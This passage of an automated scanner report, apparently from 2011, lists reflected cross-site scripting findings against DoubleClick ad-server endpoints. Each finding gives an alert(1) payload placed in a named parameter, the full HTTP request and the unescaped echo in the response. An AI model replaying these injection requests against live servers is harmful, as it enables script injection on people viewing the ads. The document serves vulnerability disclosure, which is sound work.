wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c50"-alert(1)-"67bab8d9fab was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2f0"-alert(1)-"b664736df25 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59253"-alert(1)-"0ba314982cd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
I8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28074"-alert(1)-"e33ce0f8330 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aec/f/187/%2a/p%3B239614135%3B0-0%3B0%3B62445283%3B4307-300/250%3B41553595/41571382/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIY
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44f9b"-alert(1)-"e081a0b507f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7265
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 16 Apr 2011 15:40:05 GMT
Expires: Sat, 16 Apr 2011 15:40:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
xhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507fhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75837"-alert(1)-"704dcbf347f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE75837"-alert(1)-"704dcbf347f&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6772"-alert(1)-"80ae9066ab0 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:39:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7283

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912b6772"-alert(1)-"80ae9066ab0&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62c53"-alert(1)-"9354907b3e was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=162c53"-alert(1)-"9354907b3e&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=;ord=1349914408? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 16 Apr 2011 15:38:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7279

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
